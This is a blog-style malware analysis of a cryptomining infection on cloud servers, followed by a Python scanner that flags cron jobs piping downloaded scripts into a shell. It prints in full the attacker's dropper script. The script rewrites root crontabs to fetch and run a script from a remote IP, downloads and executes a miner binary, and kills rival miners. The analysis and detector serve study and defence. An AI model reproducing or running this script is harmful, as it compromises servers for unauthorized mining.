
Analysis of the qW3xT.2 cryptomining malware script

Recently two Alibaba Cloud servers were infected with a cryptomining virus, and their CPU usage sat at 100% the whole time. This post will not go into how to clean it up; there are plenty of resources online for that. Out of curiosity I downloaded the script that the malware runs from its scheduled task, so everyone can study it.

Every compromised host had this entry in its scheduled tasks:

*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

This downloads the i.sh script and pipes it straight into sh for execution. So I downloaded the script, and here is its original text for critical study:

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "" > /var/spool/cron/root

echo "*/15 * * * * wget -q -O- http://13.113.240.221:8000/i.sh | sh" >> /var/spool/cron/root

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root

echo "*/15 * * * * wget -q -O- http://13.113.240.221:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

ps auxf | grep -v grep | grep /tmp/ddgs.3014 || rm -rf /tmp/ddgs.3014
if [ ! -f "/tmp/ddgs.3014" ]; then
    wget -q http://13.113.240.221:8000/static/3014/ddgs.$(uname -m) -O /tmp/ddgs.3014

fi
chmod +x /tmp/ddgs.3014 && /tmp/ddgs.3014

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

The script is fairly simple, and I did not find anything surprising in it. If any readers have thoughts on it, feel free to leave a comment and discuss.
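As an added example (not part of the original post or of the malware script), here is a small defender-side check that scans crontab content for the download-and-pipe-to-shell pattern the post describes, reporting the schedule and the fetched URL. The sample crontab lines are constructed and reuse the two URLs quoted above; the file paths are the ones the i.sh script itself rewrites.

```python
import re

# Constructed sample crontab content; the two pipe-to-shell entries mirror the
# cron lines quoted in the post, the first line is a benign entry for contrast.
SAMPLE_CRONTAB = """\
0 2 * * * /usr/bin/logrotate /etc/logrotate.conf
*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
*/15 * * * * wget -q -O- http://13.113.240.221:8000/i.sh | sh
"""

# Cron files that the i.sh script overwrites (paths taken from the script above).
CRON_FILES = ["/var/spool/cron/root", "/var/spool/cron/crontabs/root"]

# Five schedule fields (or an @reboot-style keyword) followed by the command.
CRON_SCHEDULE = re.compile(r"^(?:@\w+\s+|(?:\S+\s+){5})")
# A downloader that writes to stdout, with the fetched body piped into a shell.
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|]*?(?P<url>https?://[^\s'\"]+)[^|]*\|\s*(?:ba|da|z)?sh\b"
)


def find_pipe_to_shell(crontab_text):
    """Return (line_no, schedule, url) for each entry that downloads a script and pipes it to a shell."""
    findings = []
    for no, line in enumerate(crontab_text.splitlines(), start=1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # blank line or comment
        sched = CRON_SCHEDULE.match(line)
        if not sched:
            continue  # environment assignment such as PATH=..., not a job
        hit = PIPE_TO_SHELL.search(line[sched.end():])
        if hit:
            findings.append((no, sched.group(0).strip(), hit.group("url")))
    return findings


def scan_cron_files(paths=CRON_FILES):
    """Scan the given crontab files, skipping any that are absent or unreadable."""
    results = {}
    for path in paths:
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                results[path] = find_pipe_to_shell(fh.read())
        except OSError:
            continue
    return results
```

Running `scan_cron_files()` as root on a suspect host reports every job in the two cron files that fetches a remote script and executes it, which is the persistence mechanism shown in the post.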